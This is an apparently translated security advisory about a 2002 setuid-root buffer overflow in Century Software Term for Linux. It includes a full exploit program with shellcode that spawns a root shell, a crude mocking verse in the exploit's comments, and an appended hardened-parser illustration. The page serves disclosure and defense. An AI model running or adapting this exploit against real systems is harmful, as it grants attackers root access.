Century Software Term Command-Line Buffer Overflow Vulnerability

Published: 2002-02-28
Updated: 2002-02-28
Severity: High
Threat level: Local administrator (root) privileges
Error type: Boundary check error
Exploit vector: Physical access (local)
BUGTRAQ ID: 4174

Affected systems
Century Software Term For Linux 6.27.0869

Detailed description
Under certain conditions a local user can use Term to execute arbitrary code. When Term receives an argument through the tty option it does not check the argument's length, so an over-long argument overflows a buffer; because the program runs setuid root, arbitrary commands can then be executed with root privileges.

Test code

/********************************************************/
/* ex-callin.c - Haiku Hacker <haiku@hushmail.com>      */
/* Exploits the buffer overflow in Century Software's   */
/* calling component of the Term program for Linux.     */
/********************************************************/
/* Greets, love, and respect to:                        */
/* KF, Merc, Synapse, UPT old and new, Lance Spitzner,  */
/* egami, comega, jericho, and most importantly sl1k    */
/* for his guidance, coaching, and tutoring.            */
/********************************************************/
/* RFP's Pants                                          */
/* -----------                                          */
/* Rain Forest Puppy                                    */
/* Wears tight black pants to big cons                  */
/* Does he have limp wrist?                             */
/********************************************************/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>   /* execl() */

/* use this to specify the location of callin */
#define CINPATH "./callin"

int main(int argc, char **argv)
{
    /* Shellcode borrowed from Aleph1 */
    char shellcode[] =
        "\x29\xc0\x29\xdb\x29\xc9\x29\xd2\xb0\xa4\xcd\x80"
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
        "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
        "\xff\xff/bin/sh";

    char egg_string[300];
    int i;
    unsigned long offset = 0;

    /* optional argv[1]: adjustment added to the guessed return address */
    if (argc > 1) {
        offset = atoi(argv[1]);
    }

    /* "tty" prefix, filler up to the saved return address, then the
     * overwritten return address pointing into the NOP sled below */
    memcpy(egg_string, "tty", 3);
    for (i = 3; i < 95; i++)
        egg_string[i] = 'A';
    *(long *)(egg_string + 95) = 0xbffff67c + offset;

    /* NOP sled, with the shellcode placed at the end of the buffer */
    for (i = 99; i < 300; i++)
        egg_string[i] = 0x90;

    /* -1 leaves room for the terminating NUL inside egg_string; the
     * original placement wrote the NUL one byte past the array */
    strcpy(egg_string + (sizeof(egg_string) - strlen(shellcode) - 1), shellcode);

    execl(CINPATH, "callin", egg_string, (char *)NULL);
    return 0;
}

Solution
None yet.

Related information
KF <dotslash@snosoft.com>.
Reference: http://online.securityfocus.com/archive/82/257731
Related homepage: http://te.censoft.com/products/term_unix.php
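The defect class in the detailed description above, as an added illustration that is not Term's source (which is not on the page): a hypothetical option parser that copies the value following "tty" into a fixed-size buffer with strcpy(), beside a bounded version that refuses a value that does not fit. The struct, the function names, TTY_NAME_MAX and the 300-byte constructed argument are all assumptions.

```c
/* Added illustration, not Term's source: the unchecked-copy pattern the
 * advisory describes, beside a bounded replacement. All names are assumed. */
#include <stdio.h>
#include <string.h>
#include <errno.h>

#define TTY_NAME_MAX 32   /* assumed buffer size; Term's real size is not on the page */

struct term_opts {
    char tty[TTY_NAME_MAX];
};

/* Vulnerable pattern (hypothetical): after matching the "tty" prefix, the
 * rest of the argument is strcpy()'d into a fixed buffer with no length
 * check. An argument longer than TTY_NAME_MAX - 1 bytes runs past the
 * buffer, which in a setuid-root binary is the condition the advisory
 * reports. Kept only for side-by-side comparison; never feed it
 * untrusted input. */
int parse_tty_option_unchecked(struct term_opts *o, const char *arg)
{
    if (strncmp(arg, "tty", 3) != 0)
        return -1;
    strcpy(o->tty, arg + 3);      /* the defect: no bound on the copy */
    return 0;
}

/* Hardened version: measure the value first, reject anything that does not
 * fit (rather than truncating silently, which can itself change meaning),
 * then copy exactly the measured number of bytes and terminate. */
int parse_tty_option_checked(struct term_opts *o, const char *arg)
{
    const char *val;
    size_t n;

    if (strncmp(arg, "tty", 3) != 0)
        return -1;
    val = arg + 3;
    n = strlen(val);
    if (n >= sizeof o->tty) {
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(o->tty, val, n);
    o->tty[n] = '\0';
    return 0;
}

/* Builds an argument shaped like the one in the advisory's test code (the
 * "tty" prefix followed by filler to ~300 bytes; constructed here, no real
 * payload) and reports whether the checked parser rejects it. Returns 1 if
 * it was rejected with ENAMETOOLONG, 0 otherwise. */
int checked_parser_rejects_oversized(void)
{
    struct term_opts o;
    char big[300];

    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    memcpy(big, "tty", 3);
    errno = 0;
    return parse_tty_option_checked(&o, big) == -1 && errno == ENAMETOOLONG;
}

int main(void)
{
    struct term_opts o;

    if (parse_tty_option_checked(&o, "tty/dev/ttyS1") == 0)
        printf("accepted: %s\n", o.tty);
    printf("oversized argument rejected: %d\n", checked_parser_rejects_oversized());
    return 0;
}
```

The rejecting version is preferable to a strncpy() truncation: a silently shortened device path is still a bug, and returning an error keeps the setuid program from continuing with a value it never validated.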